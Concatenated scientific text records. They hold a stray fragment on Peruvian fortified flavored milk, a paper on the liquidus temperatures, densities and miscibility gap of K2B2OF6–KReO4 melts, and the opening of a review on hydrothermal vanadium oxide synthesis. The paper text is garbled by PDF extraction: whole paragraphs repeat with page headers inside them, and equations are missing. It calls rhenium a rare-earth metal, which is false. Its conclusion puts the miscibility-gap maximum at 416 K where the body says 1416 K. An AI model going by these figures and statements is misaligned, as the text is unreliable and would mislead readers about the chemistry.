The Regulation of Law No. 30021 -"Ley de Promoción de la Alimentación Saludable para niños y adolescentes del gobierno peruano" (El Peruano, 2017), requires the Results of the physiochemical analysis of fresh milk and fortified chocolate flavored milk.
Table 5 .
Microbiological analysis of fortified flavored milk. | 2024-06-22T15:21:25.829Z | 2024-06-20T00:00:00.000 | {
"year": 2024,
"sha1": "4760299c29ef9d287ec8b779d2a9618f7ee7385f",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.26656/fr.2017.8(3).288",
"oa_status": "GOLD",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "13bc4f315d8de591310945ec54c2fa7fb8c5bf3a",
"s2fieldsofstudy": [
"Agricultural and Food Sciences",
"Medicine"
],
"extfieldsofstudy": []
} |
265010762 | pes2o/s2orc | v3-fos-license | Melting Behavior and Densities of K 2 B 2 OF 6 Melts Containing KReO 4
: Methods of simultaneous thermal analysis (differential scanning calorimetry, thermo-gravimetry) and an analysis of cooling curves were used to study the melting of K 2 B 2 OF 6 –(0–15 wt. %) KReO 4 melts. The synthesis of K 2 B 2 OF 6 was performed by alloying KF, KBF 4 , and B 2 O 3 components. The liquidus temperature dependence on the content of potassium perrhenate in the K 2 B 2 OF 6 – (0–15 wt. %) KReO 4 melts was determined. It was found that the addition of up to 6 wt. % KReO 4 caused an increase in the melt liquidus temperature to 733 K. Further increases in potassium perrhen-ate did not change the temperature of the primary crystallization (733 ± 5 K) of the K 2 B 2 OF 6 –KReO 4 melt. This fact testifies to the presence of the monotectic reaction. It was found that the relative loss of mass of the K 2 B 2 OF 6 –(0–15 wt. %) KReO 4 melts did not exceed 2.1%. The delamination of the K 2 B 2 OF 6 –KReO 4 melt was revealed according to the values of the primary crystallization temperatures (liquidus temperatures) in different layers of the melt. The density of the K 2 B 2 OF 6 –KReO 4 melts as a function of potassium perrhenate content (0–15 wt. %) was investigated at 628–933 K. The temperature dependence of the K 2 B 2 OF 6 –KReO 4 melts’ densities was recorded. They are presented as linear functions. The curves of the density temperature dependence of the K 2 B 2 OF 6 –KReO 4 melts were used to determine the critical temperatures, i.e., the boundaries of the miscibility gap. The miscibility gap of the K 2 B 2 OF 6 –KReO 4 melts is limited to 1 wt. % and 15 wt. % KReO 4 content.
Introduction
Rhenium is a rare-earth metal that is widely used in heat-resistant superalloys, platinum-rhenium catalysts, and prospective structural materials for rocket and space technology [1][2][3][4][5][6][7][8][9][10][11][12][13].The trend of providing various industries with high-tech products in the next 150 years will lead to the exhaustion of the proven reserves of rhenium in the Earth's crust [14].To date, about 80% of Re is consumed in the production of superalloys, about 15% of Re is used as a catalyst in fuel production, and the remaining 5% of Re is used in alloy form, applied as electrical contacts, electromagnets, heating elements, mass spectrographs, semiconductors, thermocouples, vacuum pipes, etc. [15].The United States is the main consumer of rhenium, which is primarily used for heat-resistant alloy production; US consumption reached ~43,000 kg of Re in 2021, with a total global Re production of 59,000 kg per year.The global interest in Re is expected to grow, especially in the space industry.Rhenium is an important metal for different industrial areas, which is why having a stable rhenium production source has become a vital issue.Thus, Pratt & Whitney-an aerospace manufacturer-analyzed the market and came to the conclusion that their key operation of gas turbine engine design and production may be affected by rhenium shortages.Therefore, in 2014, the company bought 230,000 kg of Re to ensure a stable operation cycle [12].Currently, Re is produced as a by-product of pyrometallurgical molybdenum production.During this process, rhenium compounds are oxidized to volatile rhenium oxide, Re 2 O 7 .This oxide is collected, together with outgoing smoke gases, and extracted in the form of rhenium acid or ammonium perrhenate.Ammonium perrhenate is a raw product for further metallic rhenium production.Metallic rhenium is mainly produced by reduction using gaseous hydrogen at temperatures close to 1273 K [16].In this regard, a significant effort should be dedicated to identifying resource-saving technologies for the recycling of rhenium materials.The most promising secondary sources of rhenium were predicted [1] to be KReO 4 and NH 4 ReO 4 compounds or rhenium metal powder (as a result of its reduction by hydrogen).The method of hydrogen reduction has a number of disadvantages, such as complex instrumentation requirements, the usage of gaseous hydrogen at high temperatures, and the possibility of obtaining rhenium only in a powder form.
Molten salt electrolysis is a promising process for obtaining rhenium.It can enable both the production of metallic rhenium from its compounds and the compaction of metallic rhenium powders, yielding finished or semi-finished products with a density close to the theoretical one [2].The properties of molten salts are the basis of electrochemical technologies for obtaining metals [17,18].It is widely known that, by using molten salts, it is possible to obtain metallic coatings with desired properties, including roughness, mechanical strength, specific surface, density, etc. [19,20].
The fluoroborate melts' liquidus temperature and the densities' temperature dependence are required to develop the electrolytic rhenium-obtaining process.No corresponding data for fluoroborate melts were found.
The liquidus temperature determines the lowest temperature that can be used in electrolysis.Data on the melt densities are required for the technological calculations and equipment design.In addition to its practical significance, the liquidus temperature and density data are also important for the investigation of the KReO 4 and KF-KBF 4 -B 2 O 3 melts' interaction.
Nevertheless, Kataev et al. presented data on the interaction of B 2 O 3 with fluoride KF-AlF 3 and KF-NaF-AlF 3 molten salts [23].It was found that the interaction between individual components of the melts is realized according to the reaction: Oxyfluoroborate, K 2 B 2 OF 6 , can be obtained using reaction (1).The thermodynamic possibility of oxyfluoroborate formation has been verified and experimentally confirmed [24].The reaction that binds various boron complex compounds in the melts is presented as follows: The results in [24] show that the K 2 B 2 OF 6 melt is formed in the KF-KBF 4 -B 2 O 3 molten mixture in the form of oxyfluoroborate complexes according to reaction (2).The melting point of K 2 B 2 OF 6 is 628 K, and that of K 3 B 3 O 3 F 6 is 705 K [25].
Potassium perrhenate (KReO 4 ) is a rhenium chemical compound with a relatively low melting temperature of 828 K and a boiling temperature of 1643 K [26].
The purpose of this work was to obtain the densities' temperature dependence and to determine the liquidus temperature of the prospective KF-KBF 4 -B 2 O 3 -KReO 4 melts.The KF-KBF 4 -B 2 O 3 melt was chosen as a solvent because its composition corresponds stoichiometrically to the low-melting potassium oxyfluoroborate, K 2 B 2 OF 6 .The results obtained are required for determining the basics of rhenium-obtaining technology by the electrolysis of the KF-KBF 4 -B 2 O 3 -KReO 4 melts.
The potassium perrhenate powder was dried at 423 K for 3 h in the air in a glassy carbon container.Potassium tetrafluoroborate was dried at 473 K for 2 h.B 2 O 3 was remelted under vacuum and then used in the powdered form.The prepared substances were used for the melt preparation.
The substances were mixed to prepare a KF (37.28 wt.%)-KBF 4 (40.39 wt.%)-B 2 O 3 (22.33wt.%) mixture.The mixture was placed in the glassy carbon container.The container was placed inside a quartz retort.Then, it was heated to 773 K and kept in the molten state for 4 h.Thus, a stoichiometric melt corresponding to the K 2 B 2 OF 6 composition was synthesized.To confirm the phase composition of the resulting melt, an X-ray phase analysis was carried out using a Rigaku D/MAX-2200VL/PC X-ray diffractometer (Rigaku Corporation, Matsubara-cho, Akishima-shi, Tokyo, Japan).Figure 1 shows the results of the K 2 B 2 OF 6 molten salt X-ray analysis.
The potassium perrhenate powder was dried at 423 K for 3 h in the air in a glassy carbon container.Potassium tetrafluoroborate was dried at 473 K for 2 h.B2O3 was remelted under vacuum and then used in the powdered form.The prepared substances were used for the melt preparation.
The substances were mixed to prepare a KF (37.28 wt.%)-KBF4 (40.39 wt.%)-B2O3 (22.33 wt.%) mixture.The mixture was placed in the glassy carbon container.The container was placed inside a quartz retort.Then, it was heated to 773 K and kept in the molten state for 4 h.Thus, a stoichiometric melt corresponding to the K2B2OF6 composition was synthesized.To confirm the phase composition of the resulting melt, an X-ray phase analysis was carried out using a Rigaku D/MAX-2200VL/PC X-ray diffractometer (Rigaku Corporation, Matsubara-cho, Akishima-shi, Tokyo, Japan).Figure 1 shows the results of the K2B2OF6 molten salt X-ray analysis.
The required content of the potassium perrhenate powder was added to the K2B2OF6 melts to form the desired K2B2OF6-KReO4 melts.The prepared mixture was subjected to a chemical composition analysis, the results of which are presented in Table 1.The required content of the potassium perrhenate powder was added to the K 2 B 2 OF 6 melts to form the desired K 2 B 2 OF 6 -KReO 4 melts.The prepared mixture was subjected to a chemical composition analysis, the results of which are presented in Table 1.The results of the X-ray analysis show that the initial K 2 B 2 OF 6 melt is monophase.The obtained results correspond to the experimental data reported in [24].
Measuring Procedures
Density measurements are generally carried out according to the hydrostatic weighing method.The method involves measuring the change in a spherical platinum weight immersed in the melt [27][28][29].
The experimental cell was a quartz retort plugged with a vacuum rubber stopper, which was connected to a Mettler AT20 electronic balance (Mettler-Toledo GmbH, Greifensee, Switzerland).The platinum weight (diameter of 6.8 × 10 −3 m) was hung on a platinum wire, about 0.6 m long and 2 × 10 −4 m in diameter, and was connected to the electronic balance.
A special lift was used to immerse the platinum weight in and extract it from the melt.All measurements were carried out in an argon atmosphere of 99.999% purity (UralCryoGas LLC, Ekaterinburg, Russia).The spherical platinum weight was successively weighed first in the gaseous atmosphere and then in the molten salts.
The densities of the molten salts were calculated according to Equation (3), where the difference between the weight's mass in the gaseous atmosphere and in the melts is divided by the volume of the weight.
where d is the melt density, kg/m 3 ; m 1 is the mass of the weight in the air, kg; m 2 is the mass of the weight immersed in the melt, kg; and V is the volume of the Pt ball and is equal to 1.6485 × 10 −7 m 3 .The schematic of the measuring cell is presented in Figure 2.
Processes 2023, 11, x FOR PEER REVIEW 4 of 13 The results of the X-ray analysis show that the initial K2B2OF6 melt is monophase.The obtained results correspond to the experimental data reported in [24].
Measuring Procedures
Density measurements are generally carried out according to the hydrostatic weighing method.The method involves measuring the change in a spherical platinum weight immersed in the melt [27][28][29].
The experimental cell was a quartz retort plugged with a vacuum rubber stopper, which was connected to a Mettler AT20 electronic balance (Mettler-Toledo GmbH, Greifensee, Switzerland).The platinum weight (diameter of 6.8 × 10 −3 m) was hung on a platinum wire, about 0.6 m long and 2 × 10 −4 m in diameter, and was connected to the electronic balance.
A special lift was used to immerse the platinum weight in and extract it from the melt.All measurements were carried out in an argon atmosphere of 99.999% purity (UralCryoGas LLC, Ekaterinburg, Russia).The spherical platinum weight was successively weighed first in the gaseous atmosphere and then in the molten salts.
The densities of the molten salts were calculated according to Equation ( 3), where the difference between the weight's mass in the gaseous atmosphere and in the melts is divided by the volume of the weight.
where is the melt density, kg/m 3 ; is the mass of the weight in the air, kg; is the mass of the weight immersed in the melt, kg; and is the volume of the Pt ball and is equal to 1.6485 × 10 −7 m 3 .The schematic of the measuring cell is presented in Figure 2. The density investigation of the K 2 B 2 OF 6 -KReO 4 melts was carried out in a temperature range of 929-628 K.The glass-carbon crucible SU-2000 (DONKARB GRAFITE LLC, Chelyabinsk, Russia) was used as a container for the melts.The glass-carbon crucible had a volume of 1.1 × 10 −4 m 3 (dimensions: the basic diameter was 5 × 10 −2 m; the top diameter was 7.3 × 10 −2 m; the height was 6.9 × 10 −2 m).The moving device was used to fix the platinum weight's location with an accuracy of 10 µm along the crucible axis.
The density measurements for each melt composition were repeated at least 3 times.The obtained results of parallel measurements were averaged.
The preliminary experiments elucidated that K 2 B 2 OF 6 -KReO 4 melts are layered systems.The results of the densities measurement can be represented in two positions.The top position is realized when the platinum weight is located about 5 × 10 −3 m above the melts' surfaces.The bottom position is realized when the platinum weight is located about 5 × 10 −3 m higher than the crucible bottom.Changing the platinum weight's position by 1-2 × 10 −3 m lower or higher resulted in densities' temperature dependence being irreproducible when recorded at different temperatures.This fact could be explained by the influence of two non-mixed liquids on the platinum weight.It should be mentioned here that, when using this method, the interfacial forces acting on the Pt wire at the upper-liquid-gas and lower-liquid-upper-liquid interfaces [30] cause a singularity.
The crystallization temperatures and the temperatures of phase transitions were obtained by performing a thermal analysis based on a heat release evaluation.The time dependence of the thermocouple EMF was recorded using an APPA 502 multimeter (APPA Technology Corp., New Taipei City, Taiwan) during both the heating and cooling of the melts.The temperature was automatically measured every second.The average cooling and heating rates were 4.8 and 7.1 K per minute, respectively.The differences in temperatures at the points of phase transitions obtained during heating/cooling cycles did not exceed the measurement error (~5 K).
Results and Discussion
The study of the K 2 B 2 OF 6 -KReO 4 melts was carried out in a temperature range of 307 K-873 K by STA. Figure 3 shows the data from the DSC and thermogravimetric analyses of the K 2 B 2 OF 6 melts.
Processes 2023, 11, x FOR PEER REVIEW 5 of 13 The density investigation of the K2B2OF6-KReO4 melts was carried out in a temperature range of 929-628 K.The glass-carbon crucible SU-2000 (DONKARB GRAFITE LLC, Chelyabinsk, Russia) was used as a container for the melts.The glass-carbon crucible had a volume of 1.1 × 10 −4 m 3 (dimensions: the basic diameter was 5 × 10 −2 m; the top diameter was 7.3 × 10 −2 m; the height was 6.9 × 10 −2 m).The moving device was used to fix the platinum weight's location with an accuracy of 10 µm along the crucible axis.
The density measurements for each melt composition were repeated at least 3 times.The obtained results of parallel measurements were averaged.
The preliminary experiments elucidated that K2B2OF6-KReO4 melts are layered systems.The results of the densities measurement can be represented in two positions.The top position is realized when the platinum weight is located about 5 × 10 −3 m above the melts' surfaces.The bottom position is realized when the platinum weight is located about 5 × 10 −3 m higher than the crucible bottom.Changing the platinum weight's position by 1-2 × 10 −3 m lower or higher resulted in densities' temperature dependence being irreproducible when recorded at different temperatures.This fact could be explained by the influence of two non-mixed liquids on the platinum weight.It should be mentioned here that, when using this method, the interfacial forces acting on the Pt wire at the upperliquid-gas and lower-liquid-upper-liquid interfaces [30] cause a singularity.
The crystallization temperatures and the temperatures of phase transitions were obtained by performing a thermal analysis based on a heat release evaluation.The time dependence of the thermocouple EMF was recorded using an APPA 502 multimeter (APPA Technology Corp., New Taipei City, Taiwan) during both the heating and cooling of the melts.The temperature was automatically measured every second.The average cooling and heating rates were 4.8 and 7.1 K per minute, respectively.The differences in temperatures at the points of phase transitions obtained during heating/cooling cycles did not exceed the measurement error (~5 K).
Results and Discussion
The study of the K2B2OF6-KReO4 melts was carried out in a temperature range of 307 K-873 K by STA. Figure 3 shows the data from the DSC and thermogravimetric analyses of the K2B2OF6 melts.According to Figure 3, there are a number of phase transitions in solid K 2 B 2 OF 6 -KReO 4 while heating to the melting point of K 2 B 2 OF 6 .An exothermic heat release was observed at 403 K.This can be related to the grain recrystallization caused by the compaction of the crystal structure.A significant change in the heat flux was observed at 551.4-552.2K.
The phase transition temperature coincided with the predicted one for the formation of K 10 B 38 O 62 structural groups [31].It should be noted that the samples of the K 2 B 2 OF 6 melts, including those containing KReO 4 , were X-ray amorphous.So, it is difficult to identify a specific phase transition in the solid state.It was found that the melting temperature of the K 2 B 2 OF 6 compound was 628 K.According to the differential scanning calorimetry data, the solidus temperature for the K 2 B 2 OF 6 -(0-15 wt.%) KReO 4 melts was 628 K.
It was found that the addition of KReO 4 up to 6 wt.% to the K 2 B 2 OF 6 melts resulted in the appearance of an exothermic effect at a temperature of about 773 K, which was accompanied by an increase in the mass loss of the melts (Figure 4).This fact is probably related to the crystallization area of the volatile Re 2 O 7 and the more refractory K 3 ReO 5 compound.The presence of rhenium compounds in the Re +7 oxidation state in the K 2 B 2 OF 6 -KReO 4 melts is in agreement with the results reported in [32].Presumably, the following reaction related to the release of rhenium oxide takes place in the melts: Processes 2023, 11, x FOR PEER REVIEW 6 of 13 According to Figure 3, there are a number of phase transitions in solid K2B2OF6-KReO4 while heating to the melting point of K2B2OF6.An exothermic heat release was observed at 403 K.This can be related to the grain recrystallization caused by the compaction of the crystal structure.A significant change in the heat flux was observed at 551.4-552.2K.The phase transition temperature coincided with the predicted one for the formation of K10B38O62 structural groups [31].It should be noted that the samples of the K2B2OF6 melts, including those containing KReO4, were X-ray amorphous.So, it is difficult to identify a specific phase transition in the solid state.It was found that the melting temperature of the K2B2OF6 compound was 628 K.According to the differential scanning calorimetry data, the solidus temperature for the K2B2OF6-(0-15 wt.%) KReO4 melts was 628 K.
It was found that the addition of KReO4 up to 6 wt.% to the K2B2OF6 melts resulted in the appearance of an exothermic effect at a temperature of about 773 K, which was accompanied by an increase in the mass loss of the melts (Figure 4).This fact is probably related to the crystallization area of the volatile Re2O7 and the more refractory K3ReO5 compound.The presence of rhenium compounds in the Re +7 oxidation state in the K2B2OF6-KReO4 melts is in agreement with the results reported in [32].Presumably, the following reaction related to the release of rhenium oxide takes place in the melts: The presence of the K3ReO5 compound in the samples of the K2B2OF6-KReO4 melts was detected by X-ray phase analysis (Figure 5).The data analysis showed that rhenium was present in two phases, namely, KReO4 and K3ReO5, in the solidified melts [33].The K2B2OF6 compound had a glass structure, and it did not have any individual peaks in the diffraction pattern.The presence of any other phases was not determined.The presence of the K 3 ReO 5 compound in the samples of the K 2 B 2 OF 6 -KReO 4 melts was detected by X-ray phase analysis (Figure 5).The data analysis showed that rhenium was present in two phases, namely, KReO 4 and K 3 ReO 5 , in the solidified melts [33].The K 2 B 2 OF 6 compound had a glass structure, and it did not have any individual peaks in the diffraction pattern.The presence of any other phases was not determined.An increase in the content of KReO4 from 2 to 6 wt.% resulted in a decrease in the temperature of the exothermic heat release from 793 to 773 K.We associate this with the fact that the melt composition shifts to the area of the K3ReO5 crystallization in the K2B2OF6-KReO4 phase diagram.
All thermal effects can be systemized.The majority of them are associated with phase transitions in the solid states of K2B2OF6 and K2B2OF6-KReO4, and additional investigations will be necessary in the future to determine their mechanisms (Table 2).An increase in the content of KReO 4 from 2 to 6 wt.% resulted in a decrease in the temperature of the exothermic heat release from 793 to 773 K.We associate this with the fact that the melt composition shifts to the area of the K 3 ReO 5 crystallization in the K 2 B 2 OF 6 -KReO 4 phase diagram.
All thermal effects can be systemized.The majority of them are associated with phase transitions in the solid states of K 2 B 2 OF 6 and K 2 B 2 OF 6 -KReO 4 , and additional investigations will be necessary in the future to determine their mechanisms (Table 2).The analyses of the thermogravimetric dependence indicate that the relative loss of the mass does not exceed 2.05 % for the K 2 B 2 OF 6 melts with the addition of 15 wt.% of KReO 4 at 873 K.The data obtained were used as a source for determining the liquidus temperatures of the K 2 B 2 OF 6 -KReO 4 system.Table 3 shows the liquidus temperatures of the K 2 B 2 OF 6 -KReO 4 systems depending on the KReO 4 content.It is found that an increase in the KReO 4 concentration to 6 wt.% results in the liquidus temperature rising from 628 to 733 K. Increasing the potassium perrhenate concentration above 6 wt.% does not influence the liquidus temperature.The immutability of the liquidus temperature of the K 2 B 2 OF 6 -KReO 4 melts with increasing KReO 4 content indicates the presence of a miscibility gap.Further measurements of the liquidus temperatures of the K 2 B 2 OF 6 -KReO 4 melts at various melt-level points confirmed the existence of the phase separation.The liquidus temperature stabilization at a temperature of 733 K for melt compositions of K 2 B 2 OF 6 -(4-15 wt.%) KReO 4 elucidated that the melt state was within the boundaries of the miscibility gap of the phase diagram.
The experimental data on the liquidus temperature were used to determine the temperature range of the density measurements of the K 2 B 2 OF 6 -KReO 4 melts.The temperature dependence of densities was measured at two level points of the K 2 B 2 OF 6 -KReO 4 melts: 1-immersed by 5 × 10 −3 m from the melt mirror (upper layer-"U"); 2-suspended about 5 × 10 −3 m from the bottom of the container with the melt (conditionally, the lower layer-"L").It was discovered that the temperature dependence of the melt densities could be described by linear equations (Table 2).It was found that the K 2 B 2 OF 6 and K 2 B 2 OF 6 -1 wt.% KReO 4 melts (№. 1 and №. 2 in Table 2) did not delaminate in the entire range of the temperatures studied.
Melts №. 3-№. 10 (Table 3) delaminated.The densities of the upper and lower layers differed significantly.The temperature dependence of the densities of the K 2 B 2 OF 6 -KReO 4 melts are shown in Figure 6.It was found that the addition of up to 1 wt.% KReO4 had a negligible influence on the density homogeneity of the K2B2OF6-KReO4 melts.
Phase separation was observed for the K2B2OF6-KReO4 melts with KReO4 content above 4 wt.%.It could be seen from the experimental data that the densities of the upper and lower phases started to differ, and phases did not mix with up to 15 wt.% KReO4.Such behavior is consistent with the data obtained by measuring the densities of the stratified molten salt systems [22].
The behavior of the temperature dependence of the K2B2OF6-KReO4 (4-15 wt.) melts' densities (compositions with phase separation) is in accordance with the results reported in [34].The densities' temperature dependence can be approximated by linear functions.
The density of the heavier phase of K2B2OF6-KReO4 (4-10 wt.%) decreased more rapidly.This indirectly indicates the lower solubility of the heavy component in the light layer and its better solubility in the heavy layer.The densities of the upper and lower phases approached each other as the temperature and KReO4 content increased.Figure 7 shows the density isotherms of the K2B2OF6-KReO4 melts for the upper and lower layers at T = 820 K.It was found that the addition of up to 1 wt.% KReO 4 had a negligible influence on the density homogeneity of the K 2 B 2 OF 6 -KReO 4 melts.
Phase separation was observed for the K 2 B 2 OF 6 -KReO 4 melts with KReO 4 content above 4 wt.%.It could be seen from the experimental data that the densities of the upper and lower phases started to differ, and phases did not mix with up to 15 wt.% KReO 4 .Such behavior is consistent with the data obtained by measuring the densities of the stratified molten salt systems [22].
The behavior of the temperature dependence of the K 2 B 2 OF 6 -KReO 4 (4-15 wt.) melts' densities (compositions with phase separation) is in accordance with the results reported in [34].The densities' temperature dependence can be approximated by linear functions.
The density of the heavier phase of K 2 B 2 OF 6 -KReO 4 (4-10 wt.%) decreased more rapidly.This indirectly indicates the lower solubility of the heavy component in the light layer and its better solubility in the heavy layer.The densities of the upper and lower phases approached each other as the temperature and KReO 4 content increased.Figure 7 shows the density isotherms of the K 2 B 2 OF 6 -KReO 4 melts for the upper and lower layers at T = 820 K.It was found that the melt density increased as the composition of the K2B2OF6-KReO4 (4-15 wt.%) melts changed.This is in agreement with the fact that a higher rhenium concentration (as a powerful complexing agent) increases the densities of the K2B2OF6-KReO4 melts.The densities of the upper and lower layers were found to vary.This indicates that the K2B2OF6-KReO4 (4-15 wt.%) melts are characterized by different values of critical temperature.The critical temperature is the upper boundary of the miscibility gap.At the same time, the trend changed significantly for the K2B2OF6-15 wt.% KReO4 melts (Figure 7), and it indicates the convergence of phase densities to the critical point at lower temperatures.
Tkachev et al. reported that the value of the critical temperature TCr, i.e., the upper boundary of the miscibility gap, in a molten salt corresponded to the same density of two liquids within the boundaries of the miscibility gap.Thus, the critical temperature can be predicted by solving the system of linear equations (Table 3) for one composition, provided that the densities of the upper and lower layers are equal to: where is the temperature, K; is the upper layer's density, g/cm 3 ; is the lower layer's density, g/cm 3 ; , , , are the linear equation coefficients of the density's temperature dependence for the upper and lower layers.We calculated the critical temperatures for the K2B2OF6-KReO4 (4-15 wt.%) molten systems.For that purpose, the system of equations of the densities' temperature dependence (data of Table 2) for the upper and lower layers was constructed.The solution to the system of equations was obtained under the condition of the equality of the upper and lower layers at the critical temperature Tcr.
The obtained values of critical temperature, as well as the liquidus and monotectic ones, can be summarized.Figure 8 shows the liquidus, monotectic, and critical temperatures of the K2B2OF6-KReO4 (0-15 wt.%) melts.It was found that the melt density increased as the composition of the K 2 B 2 OF 6 -KReO 4 (4-15 wt.%) melts changed.This is in agreement with the fact that a higher rhenium concentration (as a powerful complexing agent) increases the densities of the K 2 B 2 OF 6 -KReO 4 melts.The densities of the upper and lower layers were found to vary.This indicates that the K 2 B 2 OF 6 -KReO 4 (4-15 wt.%) melts are characterized by different values of critical temperature.The critical temperature is the upper boundary of the miscibility gap.At the same time, the trend changed significantly for the K 2 B 2 OF 6 -15 wt.% KReO 4 melts (Figure 7), and it indicates the convergence of phase densities to the critical point at lower temperatures.
Tkachev et al. reported that the value of the critical temperature T Cr , i.e., the upper boundary of the miscibility gap, in a molten salt corresponded to the same density of two liquids within the boundaries of the miscibility gap.Thus, the critical temperature can be predicted by solving the system of linear equations (Table 3) for one composition, provided that the densities of the upper and lower layers are equal to: where T is the temperature, K; ρ u is the upper layer's density, g/cm 3 ; ρ l is the lower layer's density, g/cm 3 ; a u , b l , a u , b l are the linear equation coefficients of the density's temperature dependence for the upper and lower layers.We calculated the critical temperatures for the K 2 B 2 OF 6 -KReO 4 (4-15 wt.%) molten systems.For that purpose, the system of equations of the densities' temperature dependence (data of Table 2) for the upper and lower layers was constructed.The solution to the system of equations was obtained under the condition of the equality of the upper and lower layers at the critical temperature T cr .
The obtained values of critical temperature, as well as the liquidus and monotectic ones, can be summarized.Figure 8 shows the liquidus, monotectic, and critical temperatures of the K 2 B 2 OF 6 -KReO 4 (0-15 wt.%) melts.
The results of the critical temperature calculation indicate that the peak of the miscibility gap in the K 2 B 2 OF 6 -KReO 4 melts corresponds to a temperature of about 1416 K at a potassium perrhenate concentration of 6 wt.%.The critical temperature dependence on the concentration of potassium perrhenate is extreme.An increase in the potassium perrhenate content up to 15 wt.% in the K 2 B 2 OF 6 -KReO 4 melts causes the critical temperature to decrease down to 775 K. Thus, the miscibility gap of the K 2 B 2 OF 6 -KReO 4 melts is within 1 wt.% and 15 wt.% of the KReO 4 concentration.The results of the critical temperature calculation indicate that the peak of the miscibility gap in the K2B2OF6-KReO4 melts corresponds to a temperature of about 1416 K at a potassium perrhenate concentration of 6 wt.%.The critical temperature dependence on the concentration of potassium perrhenate is extreme.An increase in the potassium perrhenate content up to 15 wt.% in the K2B2OF6-KReO4 melts causes the critical temperature to decrease down to 775 K. Thus, the miscibility gap of the K2B2OF6-KReO4 melts is within 1 wt.% and 15 wt.% of the KReO4 concentration.
Conclusions
The behavior of the K2B2OF6-KReO4 (0-15 wt.%) melts was studied by synchronous thermal analyses (differential scanning calorimetry and thermogravimetry) and the analysis of cooling curves.The liquidus and monotectic temperatures of the K2B2OF6-KReO4 melts (0-15 wt.%) were determined.It was found that the addition of up to 6 wt.% of the KReO4 compound caused the liquidus temperature to increase up to 733 K.A further increase in the potassium perrhenate concentration did not influence the primary crystallization temperature (733 ±5 K) of the K2B2OF6-KReO4 melts.This fact confirms the occurrence of the monotectic reaction.The primary crystallization temperature values of various layers of the melt reveal the presence of phase separations in the K2B2OF6-KReO4 melts.It was found that the relative mass loss of the K2B2OF6-(0-15 wt.%) KReO4 melts did not exceed 2.05%.
The densities of the K2B2OF6-KReO4 melts were studied by varying the potassium perrhenate concentration from 0 to 15 wt.% at T = 628-933 K.It was observed that the addition of 1 wt.% of the KReO4 melt to K2B2OF6 caused a slight density decrease.The densities and phase separations of the K2B2OF6-KReO4 melts increased in the KReO4 concentration range of 4-15 wt.%.This is in agreement with the conclusions on the melt phase separations obtained after the analysis of the cooling curves.
The upper boundary of the miscibility gap was determined by calculating the melts' critical temperatures.The dependence of the critical temperature on the concentration of potassium perrhenate in the K2B2OF6-KReO4 melts has an extreme character, with a maximum at about T = 416 K and 6 wt.% of the KReO4 component.
Figure 6 .
Figure 6.Experimental temperature dependence of the densities of the K 2 B 2 OF 6 -KReO 4 melts.
Figure 7 .
Figure 7. Density of the K2B2OF6-KReO4 melts depending on the content of potassium perrhenate at T = 820 K.
Figure 7 .
Figure 7. Density of the K 2 B 2 OF 6 -KReO 4 melts depending on the content of potassium perrhenate at T = 820 K.
Table 1 .
Contents of elements in the obtained deposits.
Table 1 .
Contents of elements in the obtained deposits.
Table 3 .
Coefficients of the temperature dependence of the densities of the K 2 B 2 OF 6 -KReO 4 melts. | 2023-11-05T16:04:49.199Z | 2023-11-03T00:00:00.000 | {
"year": 2023,
"sha1": "7fc093c30ed95e213381a8a1cd8c5dbae1483088",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2227-9717/11/11/3148/pdf?version=1699019605",
"oa_status": "GOLD",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "1547e56ac45fdf1877ae5dfdf609def300223eab",
"s2fieldsofstudy": [
"Materials Science"
],
"extfieldsofstudy": []
} |
255295933 | pes2o/s2orc | v3-fos-license | Hydrothermal Synthesis of Vanadium Oxide Microstructures with Mixed Oxidation States
: This review is based on hydrothermal synthetic procedures that generate different vanadium oxide microstructures with mixed oxidation states, where different vanadium (V 5+ ) precursors (vanadate, vanadium oxide, vanadium alkoxide, etc.) are used to obtain various types of morphologies and shapes, such as sea urchins, cogs, stars, squares, etc., depending on the amphiphilic molecules (usually surfactants) exhibiting a structural director role containing an organic functional group such as primary amines and thiols, respectively. The performance of sol–gel methodology, where intercalation processes sometimes take place, is crucial prior to the hydrothermal treatment stage to control the V 4+ /V 5+ . In every synthesis, many physical and chemical parameters, such as temperature, pH, reaction time, etc., are responsible for influencing the reactions in order to obtain different products; the final material usually corresponds to a mixed oxidation state structure with different content rates. This feature has been used in many technological applications, and some researchers have enhanced it by functionalizing the products to enhance their electrochemical and magnetic properties. Although some results have been auspicious, there are a number of projects underway to improve the synthesis in many ways, including yield, secondary products, size distribution, oxidation state ratio, etc., to achieve the best benefits from these microstructures in the large number of technological, catalytic, and magnetic devices, among other applications.
Introduction
Vanadium oxide nanostructures and microstructures have been researched in many technological applications [1][2][3][4][5], exhibiting amazing morphological characteristics [6] with different architecture types [7], from very well-defined geometric forms [8] to novel spherical clusters consisting of high-density radial arrays made from self-assembled nanotubes [9]. There are several synthetic procedures employed, such as sol-gel processes assisted by amphipathic surfactants enhanced by hydrothermal treatment; the temperature and the reaction time employed in the latter stage ranges from 180-200 • C and lasts from a few hours up to 10 days [10,11]. The most common V 5+ precursors used as starting materials are V 2 O 5 (vanadium (V) pentoxide) [12], vanadium alkoxides VO(OCH(CH 3 ) 2 ) 3 (vanadium (V) oxytriisopropoxide) [13,14], VOCl 3 (vanadium (V) oxytrichloride) [15], and NH 4 VO 3 (ammonium metavanadate) [16,17]. The synthesis commonly requires soft chemical conditions (controlled pH, inert atmosphere, room temperature) and produces the vanadium oxide network, described as an intercalation host lattice [18], where guest species are reversibly inserted between the oxide layers [19][20][21]. Amphiphilic molecules, such as amphipathic surfactants, comprising organic functional groups, such as RNH 2 and H 2 NRNH 2 (long chain alkyl primary monoamines C n H (2n+1) NH 2 , diamines H 2 NC n H (2n) NH 2 ), and dipeptides, are commonly intercalated [22][23][24][25]. Other surfactants with secondary and tertiary amines have also been employed [26,27], improving the obtention of different vanadium oxide networks, mainly layered hybrid organic-inorganic intercalation compounds, referred to as organic-inorganic layered composites with novel physical chemical properties. These vanadium oxide layers usually interact under cooperative van der Waals forces [28], mainly the vanadyl bond (V = O) and the amine functional group [29]; the most frequent interactions are with hydrogen bonds and ion-dipole forces; these interactions generate different degrees of partial reduction, depending on the amphiphilic functional group [30][31][32][33]. Vanadium oxide chemistry is based on shifting the vanadium atom's highest oxidation state to lower ones [34]; the partial reduction often yields mixed oxidation states [35]. The redox reactions performed to obtain different nanostructures are applied to various vanadium oxide (V 5+ ) precursors; the reduction proceeds to V 4+ and V 